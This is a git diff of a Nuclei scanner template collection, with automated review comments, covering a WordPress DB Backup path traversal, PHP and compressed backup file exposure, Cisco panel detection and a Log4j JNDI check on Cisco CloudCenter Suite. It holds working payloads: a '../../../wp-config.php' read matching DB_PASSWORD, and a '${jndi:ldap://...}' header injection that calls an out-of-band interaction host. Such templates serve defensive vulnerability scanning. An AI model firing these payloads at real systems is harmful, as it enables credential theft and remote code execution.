@@ -1,14 +1,17 @@ id: db-backup-lfi info: - name: DB Backup <= 4.5 - Path Traversal File Access + name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK severity: high - description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive - information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp requests: @@ -28,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/backup/db-backup-lfi.yaml b/poc/backup/db-backup-lfi.yaml index c4c6c258b9..5541cb013c 100644 --- a/poc/backup/db-backup-lfi.yaml +++ b/poc/backup/db-backup-lfi.yaml @@ -1,5 +1,4 @@ id: db-backup-lfi - info: name: DB Backup <= 4.5 - Path Traversal File Access author: dhiyaneshDK @@ -9,12 +8,10 @@ info: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 tags: wordpress,wp-plugin,lfi,wp - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -23,7 +20,6 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 
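Review bot: The new `name` and description in db-backup-lfi-6776.yaml call this a local file inclusion, but the added `cwe-id: CWE-22` and the C:H/I:N/A:N vector describe a path traversal file read. That also matches the request to `download.php?file=../../../wp-config.php` shown for this template elsewhere in the patch. Keeping one term, e.g. `name: WordPress DB Backup <=4.5 - Path Traversal`, avoids a triager assuming code inclusion. A `remediation:` line is also missing for a `severity: high` finding; the request and matchers sit outside this hunk.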
diff --git a/poc/backup/php-backup-files-9497.yaml b/poc/backup/php-backup-files-9498.yaml similarity index 100% rename from poc/backup/php-backup-files-9497.yaml rename to poc/backup/php-backup-files-9498.yaml diff --git a/poc/backup/php-backup-files.yaml b/poc/backup/php-backup-files.yaml index 9d285095bb..48988f2e39 100644 --- a/poc/backup/php-backup-files.yaml +++ b/poc/backup/php-backup-files.yaml 
@@ -1,128 +1,45 @@ id: php-backup-files - info: - name: PHP Source - Backup File Information Disclosure - author: StreetOfHackerR007,pwnhxl,mastercho,0xpugazh + name: PHP source disclosure through backup files + author: StreetOfHackerR007 (Rohit Soni) severity: medium - metadata: - max-request: 1222 - tags: exposure,backup,php,disclosure,fuzz - -http: + tags: exposure,backup,php +requests: - method: GET path: - - "{{BaseURL}}{{filepath}}{{bakext}}" - - attack: clusterbomb - payloads: - filepath: - - /wp-config.php # wordpress - - /wp-config # wordpress - - /site/default/settings.php # drupal - - /installation/configuration.php # joomla - - /app/etc/env.php # magento - - /Application/Common/Conf/config.php # thinkphp - - /environments/dev/common/config/main-local.php # yii - - /environments/prod/common/config/main-local.php # yii - - /common/config/main-local.php # yii - - /system/config/default.php # opencart - - /typo3conf/localconf.php # typo3 - - /config/config_global.php # discuz - - /config/config_ucenter.php # discuz - - /textpattern/config.php # textpattern - - /data/common.inc.php # dedecms - - /caches/configs/database.php # phpcms - - /caches/configs/system.php # phpcms - - /include/config.inc.php # phpcms - - /include/config.php # xbtit - - /includes/config.php # vbulletin - - /includes/config # vbulletin - - /phpsso_server/caches/configs/database.php # phpcms - - /phpsso_server/caches/configs/system.php # phpcms - - /zb_users/c_option.php # zblog - - /e/class/config.php # empirecms - - /e/config/config.php # empirecms - - /data/sql_config.php # phpwind - - /data/bbscache/config.php # phpwind - - /db.php - - /conn.php - - /database.php - - /db_config.php - - /config.inc.php - - /data/config.php - - /config/config.php - - /index.php - - /default.php - - /main.php - - /settings.php - - /header.php - - /footer.php - - /login.php - - /404.php - - /wp-login.php - - /config.php - - /config - - /const.DB.php.bak - bakext: - - ".~" - - ".bk" - - ".bak" - - ".bkp" 
- - ".BAK" - - ".swp" - - ".swo" - - ".swn" - - ".tmp" - - ".save" - - ".old" - - ".new" - - ".orig" - - ".dist" - - ".txt" - - ".disabled" - - ".original" - - ".backup" - - "_bak" - - "_1.bak" - - "~" - - "!" - - ".0" - - ".1" - - ".2" - - ".3" - + - "{{BaseURL}}/index.php.bak" + - "{{BaseURL}}/default.php.bak" + - "{{BaseURL}}/main.php.bak" + - "{{BaseURL}}/config.php.bak" + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/header.php.bak" + - "{{BaseURL}}/footer.php.bak" + - "{{BaseURL}}/login.php.bak" + - "{{BaseURL}}/database.php.bak" + - "{{BaseURL}}/db.php.bak" + - "{{BaseURL}}/conn.php.bak" + - "{{BaseURL}}/db_config.php.bak" + - "{{BaseURL}}/404.php.bak" + - "{{BaseURL}}/wp-config.php.bak" + - "{{BaseURL}}/wp-login.php.bak" matchers-condition: and matchers: - type: status status: - 200 - - type: word - part: body words: - "<?php" - "<?=" condition: or - - - type: word part: body + - type: word words: - "?>" - - "($" - - "$_GET[" - - "$_POST[" - - "$_REQUEST[" - - "$_SERVER[" - - "'DB_PASSWORD'" - - "'DBPASS'" - - "define('DB" - condition: or - + part: body - type: word - part: header words: - "text/plain" - "bytes" + part: header condition: or - -# digest: 4a0a00473045022100c2f95f7ee299ff0299868d14fc020a840753a4c4f6de51d4b0885f1c98422f940220085e23eb052005bcb2af3da437bc0e2be2c6a32ef3612877cbb5483e04bb1f0a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/server-backup-login-10153.yaml b/poc/backup/server-backup-login-10153.yaml new file mode 100644 index 0000000000..0639ab5356 --- /dev/null +++ b/poc/backup/server-backup-login-10153.yaml @@ -0,0 +1,19 @@ +id: server-backup-login +info: + name: Server Backup Manager SE Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6949 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - '<title>Idera Server Backup Manager SE ' + - type: status + status: + - 200 
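Review bot: The php-backup-files.yaml hunk swaps in an older revision whose second body matcher requires the literal `?>`, so exposed backups of PHP files that omit the closing tag, which is common for configuration files, would no longer be reported. The header matcher accepts the word `bytes`, which an `Accept-Ranges: bytes` header satisfies on most static responses, so it filters very little. The new side also drops `metadata`, the `# digest:` line and the `http:` key in favour of the legacy `requests:`. If the older revision is kept on purpose, the second matcher should at least accept alternatives, e.g. `- "$_SERVER["` and `- "define('DB"` with `condition: or`.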
diff --git a/poc/backup/server-backup-login-10156.yaml b/poc/backup/server-backup-login-10156.yaml deleted file mode 100644 index 4089d46390..0000000000 --- a/poc/backup/server-backup-login-10156.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: server-backup-login -info: - name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga - severity: info - reference: - - https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Idera Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/backup/server-backup-login.yaml b/poc/backup/server-backup-login.yaml index 0639ab5356..91b0a05ace 100644 --- a/poc/backup/server-backup-login.yaml +++ b/poc/backup/server-backup-login.yaml @@ -1,19 +1,33 @@ id: server-backup-login + info: - name: Server Backup Manager SE Login - author: dhiyaneshDK + name: Server Backup Manager SE Login Panel - Detect + author: dhiyaneshDKi,pathtaga severity: info - reference: https://www.exploit-db.com/ghdb/6949 - tags: panel -requests: + description: Server Backup Manager SE login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: paneil,idera,edb + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - type: word words: - 'Idera Server Backup Manager SE ' + - type: status status: - 200 + +# digest: 4b0a0048304602210090abc9072a7291db264bd80b54c29efa2d20c83fa01a7010c87a84f97737417c02210089f946777a501eb1cb19bd09e3986cd67136b5806b261332c839db98947067cd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/server-backup-manager-se-10157.yaml b/poc/backup/server-backup-manager-se-10157.yaml deleted file mode 100644 index 555ccb9f67..0000000000 
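Review bot: The new `tags: paneil,idera,edb` in server-backup-login.yaml misspells `panel`, so a run that selects or excludes templates by the `panel` tag will skip this one; it should read `tags: panel,idera,edb`. The author field changed from `dhiyaneshDK` to `dhiyaneshDKi,pathtaga`, and the stray `i` looks like the same kind of typing slip, though that is a guess. Both values also appear in the deleted server-backup-login-10156.yaml, so the typo was carried over rather than introduced here.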
--- a/poc/backup/server-backup-manager-se-10157.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: server-backup-manager-se -info: - name: Server Backup Manager SE - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Server+Backup+Manager+SE%22 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/backup/server-backup-manager-se-10160.yaml b/poc/backup/server-backup-manager-se-10160.yaml new file mode 100644 index 0000000000..94e05a332f --- /dev/null +++ b/poc/backup/server-backup-manager-se-10160.yaml @@ -0,0 +1,20 @@ +id: server-backup-manager-se +info: + name: Server Backup Manager SE + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Server Backup Manager SE" + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - 'Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/poc/backup/server-backup-manager-se-login-detect.yaml b/poc/backup/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/backup/server-backup-manager-se-login-detect.yaml +++ b/poc/backup/server-backup-manager-se-login-detect.yaml 
@@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/backup/wordpress-total-upkeep-backup-download-11322.yaml b/poc/backup/wordpress-total-upkeep-backup-download-11324.yaml similarity index 100% rename from poc/backup/wordpress-total-upkeep-backup-download-11322.yaml rename to poc/backup/wordpress-total-upkeep-backup-download-11324.yaml diff --git a/poc/backup/wordpress-total-upkeep-backup-download.yaml b/poc/backup/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..a87b8fda8d 100644 --- a/poc/backup/wordpress-total-upkeep-backup-download.yaml +++ b/poc/backup/wordpress-total-upkeep-backup-download.yaml 
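Review bot: The matcher in server-backup-manager-se-login-detect.yaml was changed from a `word` match to `regex: - ".*(Server Backup Manager SE).*"`, where the leading and trailing `.*` and the capture group add nothing: it matches exactly when the body contains that string. A plain `- type: word` with `part: body` and `words: - "Server Backup Manager SE"` says the same thing and is easier to read. Because the string is not tied to the page title, the Idera login page matched by server-backup-login would presumably hit this template too.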
@@ -1,27 +1,36 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin -requests: + metadata: + max-request: 1 + tags: wordpress,wp-plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - 200 + +# digest: 4a0a004730450220740af42e52a68f0d6689e8a42beeed0b3a97aae6409f3ada8410b0de03a612e5022100a5a7de364e6d563966439fb830a1e355ce145bd70d1b17e1704dd01f1911e9b0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/zip-backup-files-11818.yaml b/poc/backup/zip-backup-files-11818.yaml index ce98d14bd2..add5e5e76a 100644 --- a/poc/backup/zip-backup-files-11818.yaml +++ b/poc/backup/zip-backup-files-11818.yaml 
@@ -1,36 +1,79 @@ id: zip-backup-files + info: - name: Compressed Web File - author: Toufik Airane,dwisiswant0 + name: Compressed Backup File - Detect + author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl severity: medium + description: Multiple compressed backup files were detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 625 tags: exposure,backup -requests: + +http: - method: GET path: - - "{{BaseURL}}/{{Hostname}}.7z" - - "{{BaseURL}}/{{Hostname}}.bz2" - - "{{BaseURL}}/{{Hostname}}.gz" - - "{{BaseURL}}/{{Hostname}}.lz" - - "{{BaseURL}}/{{Hostname}}.rar" - - "{{BaseURL}}/{{Hostname}}.tar.gz" - - "{{BaseURL}}/{{Hostname}}.xz" - - "{{BaseURL}}/{{Hostname}}.zip" - - "{{BaseURL}}/{{Hostname}}.z" - - "{{BaseURL}}/{{Hostname}}.tar.z" - - "{{BaseURL}}/{{Hostname}}.db" - - "{{BaseURL}}/{{Hostname}}.sqlite" - - "{{BaseURL}}/{{Hostname}}.sqlitedb" - - "{{BaseURL}}/{{Hostname}}.sql.7z" - - "{{BaseURL}}/{{Hostname}}.sql.bz2" - - "{{BaseURL}}/{{Hostname}}.sql.gz" - - "{{BaseURL}}/{{Hostname}}.sql.lz" - - "{{BaseURL}}/{{Hostname}}.sql.rar" - - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" - - "{{BaseURL}}/{{Hostname}}.sql.xz" - - "{{BaseURL}}/{{Hostname}}.sql.zip" - - "{{BaseURL}}/{{Hostname}}.sql.z" - - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + - "{{BaseURL}}/{{FILENAME}}.{{EXT}}" + + attack: clusterbomb + payloads: + FILENAME: + - "{{FQDN}}" # www.example.com + - "{{RDN}}" # example.com + - "{{DN}}" # example + - "{{SD}}" # www + - "{{date_time('%Y')}}" # 2023 + - "ROOT" # tomcat + - "wwwroot" + - "htdocs" + - "www" + - "html" + - "web" + - "webapps" + - "public" + - "public_html" + - "uploads" + - "website" + - "api" + - "test" + - "app" + - "backup" + - "bin" + - "bak" + - "old" + - "Release" + - "inetpub" + EXT: + - "7z" + - "bz2" + - "gz" + - "lz" + - "rar" + - "tar.gz" + - "tar.bz2" + - "xz" + - "zip" + - "z" + - "tar.z" + - "db" + - "sqlite" + - "sqlitedb" + - "sql.7z" + - 
"sql.bz2" + - "sql.gz" + - "sql.lz" + - "sql.rar" + - "sql.tar.gz" + - "sql.xz" + - "sql.zip" + - "sql.z" + - "sql.tar.z" + - "war" max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and matchers: - type: binary @@ -48,10 +91,14 @@ requests: - "504B0304" # zip condition: or part: body + - type: regex regex: - "application/[-\\w.]+" part: header + - type: status status: - 200 + +# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-ace-device-manager.yaml b/poc/cisco/cisco-ace-device-manager.yaml index 5b017e6953..09704c579f 100644 --- a/poc/cisco/cisco-ace-device-manager.yaml +++ b/poc/cisco/cisco-ace-device-manager.yaml @@ -1,20 +1,14 @@ id: cisco-ace-device-manager info: - name: Cisco ACE 4710 Device Manager Login Panel - Detect + name: ACE 4710 Device Manager author: dhiyaneshDk severity: info - description: Cisco ACE 4710 Device Manager login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: html:"ACE 4710 Device Manager" tags: panel,cisco + metadata: + shodan-query: 'html:"ACE 4710 Device Manager"' -http: +requests: - method: GET path: - "{{BaseURL}}/index.vm" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 490a004630440220529c3b11ba4798d2d3c19dd186afc70f0dca757664d30532c5229bb8070f18ed02201f2d16437e3ced9db63fa4bd59afcc3707086ca18c86790f7356e92daf6d5dbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml deleted file mode 100644 index af3f889993..0000000000 --- a/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ /dev/null 
@@ -1,63 +0,0 @@ -id: cisco-cloudcenter-suite-log4j-rce - -info: - name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution - author: pwnhxl - severity: critical - description: | - Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - reference: - - https://logging.apache.org/log4j/2.x/security.html - - http://www.openwall.com/lists/oss-security/2021/12/10/1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 
- classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-77 - metadata: - fofa-query: title="CloudCenter Suite" - shodan-query: title:"CloudCenter Suite" - tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev - -requests: - - raw: - - | - @timeout: 10s - POST /suite-auth/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} - Content-Type: application/json - - {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - - - type: word - part: header - words: - - 'X-RateLimit-Limit-suite-gateway_suite-auth' - - extractors: - - type: kval - kval: - - interactsh_ip # Print remote interaction IP in output - - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - -# Enhanced by md on 2023/03/22 diff --git a/poc/cisco/cisco-cloudcenter-suite-rce.yaml b/poc/cisco/cisco-cloudcenter-suite-rce.yaml new file mode 100644 index 0000000000..37a4dabf81 --- /dev/null +++ b/poc/cisco/cisco-cloudcenter-suite-rce.yaml 
@@ -0,0 +1,73 @@ +id: cisco-cloudcenter-suite-log4j-rce + +info: + name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution + author: pwnhxl + severity: critical + description: | + Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 
+ reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"CloudCenter Suite" + fofa-query: title="CloudCenter Suite" + tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + +http: + - raw: + - | + @timeout: 10s + POST /suite-auth/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} + Content-Type: application/json + + {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'X-RateLimit-Limit-suite-gateway_suite-auth' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-edge-340.yaml b/poc/cisco/cisco-edge-340.yaml index 15a2a5bb06..17a60b6a18 100644 --- a/poc/cisco/cisco-edge-340.yaml +++ b/poc/cisco/cisco-edge-340.yaml 
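Review bot: The regex matcher and both regex extractors at the end of the new cisco-cloudcenter-suite-rce.yaml share one pattern whose first group, `([a-zA-Z0-9\.\-]+)`, also admits dots, so which DNS label ends up in group 1 and group 2 depends on how many labels the interaction server's domain has. With the payload layout `<6 digits>.${hostName}.accept.{{interactsh-url}}`, the groups appear to line up as hostname and the literal `accept` only when the interaction host has three labels; with a longer self-hosted domain, group 1 would absorb `accept` and the reported hostname would be wrong. A pattern keyed on the literal label, such as `\d{6}\.([a-zA-Z0-9\.\-]+)\.accept\.`, would keep group 1 stable and make the group 2 extractor unnecessary. The old file's inline comments were dropped, so I would also restore one per extractor, e.g. `# group 1: ${hostName} value reported by the target`.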
@@ -1,20 +1,14 @@ id: cisco-edge-340 info: - name: Cisco Edge 340 Panel - Detect + name: Cisco Edge 340 author: dhiyaneshDk severity: info - description: Cisco Edge 340 panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Cisco Edge 340" tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Edge 340"' -http: +requests: - method: GET path: - "{{BaseURL}}/auth/?next=%2F" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f3306c86253f0cb57ee742ac5bb06400b1a4204d1c9374ecd2cfb0c494304222022100a7136403fbb1c2cf02bced97e455c6a46474707632497b698964174880c29233:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-finesse-login-938.yaml b/poc/cisco/cisco-finesse-login-938.yaml deleted file mode 100644 index 0944959e91..0000000000 --- a/poc/cisco/cisco-finesse-login-938.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-finesse-login - -info: - name: Cisco Finesse Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in to Cisco Finesse' - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-finesse-login-940.yaml b/poc/cisco/cisco-finesse-login-940.yaml new file mode 100644 index 0000000000..ad8938564b --- /dev/null +++ b/poc/cisco/cisco-finesse-login-940.yaml 
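Review bot: The new side of cisco-edge-340.yaml goes back to the legacy `requests:` key and drops the trailing `# digest:` line together with `description`, `classification` and `max-request`, so this reads as an older copy overwriting a newer one. Without the digest the template presumably can no longer be checked against its signature, which matters for a collection that is pulled and run automatically. I would keep `http:` and the signed metadata block as they were. The same pattern shows in the hunks for CVE-2013-5528.yaml, CVE-2014-1203.yaml, CVE-2014-4561.yaml and CVE-2014-4940.yaml.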
@@ -0,0 +1,23 @@ +id: cisco-finesse-login + +info: + name: Cisco Finesse Login + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6824 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in to Cisco Finesse' + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-integrated-login-941.yaml b/poc/cisco/cisco-integrated-login-941.yaml index 0804d5a189..5f716a0018 100644 --- a/poc/cisco/cisco-integrated-login-941.yaml +++ b/poc/cisco/cisco-integrated-login-941.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/poc/cisco/cisco-meraki-exposure-944.yaml b/poc/cisco/cisco-meraki-exposure-944.yaml new file mode 100644 index 0000000000..112800ebd8 --- /dev/null +++ b/poc/cisco/cisco-meraki-exposure-944.yaml @@ -0,0 +1,25 @@ +id: cisco-meraki-exposure + +info: + name: Cisco Meraki cloud & security Appliances Information Disclosure + author: dhiyaneshDK,r3naissance + severity: info + reference: https://www.exploit-db.com/ghdb/6708 + tags: panel,cisco,meraki,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/#connection' + + matchers-condition: and + matchers: + - type: word + words: + - 'Your client connection' + - 'This security appliance is directly connected to a local network' + condition: and + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-meraki-exposure-946.yaml b/poc/cisco/cisco-meraki-exposure-946.yaml deleted file mode 100644 index d14835d3a6..0000000000 --- a/poc/cisco/cisco-meraki-exposure-946.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: cisco-meraki-exposure - -info: - name: Cisco Meraki cloud & security Appliances Information Disclosure - author: dhiyaneshDK,r3naissance - severity: info - reference: - - https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco,meraki,disclosure - -requests: - - method: GET - path: - - '{{BaseURL}}/#connection' - - matchers-condition: and - matchers: - - type: word - words: - - 'Your client connection' - - 'This security appliance is directly connected to a local network' - condition: and - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-network-config-949.yaml b/poc/cisco/cisco-network-config-949.yaml deleted file mode 100644 index e5a21f122b..0000000000 --- a/poc/cisco/cisco-network-config-949.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: cisco-network-config - -info: - name: Cisco System Network Configuration Page - Detect - author: DhiyaneshDk - severity: info - description: Cisco System Network configuration page was detected. Page lists whole network configuration and internal logs of Cisco IP phones. - reference: - - https://www.exploit-db.com/ghdb/5430 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: exposure,cisco,edb,config - -http: - - method: GET - path: - - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" - - matchers-condition: and - matchers: - - type: word - words: - - "Network Configuration" - part: body - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100813e9973d7d1eb4268049f244920487c3e1e8c5f9b58215265196a714355dc5402205619213595d60a04fcca831907236db30ba7efba530002f8c6b8637ace9f53dc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-network-config.yaml b/poc/cisco/cisco-network-config.yaml new file mode 100644 index 0000000000..a1de4cc36a --- /dev/null +++ 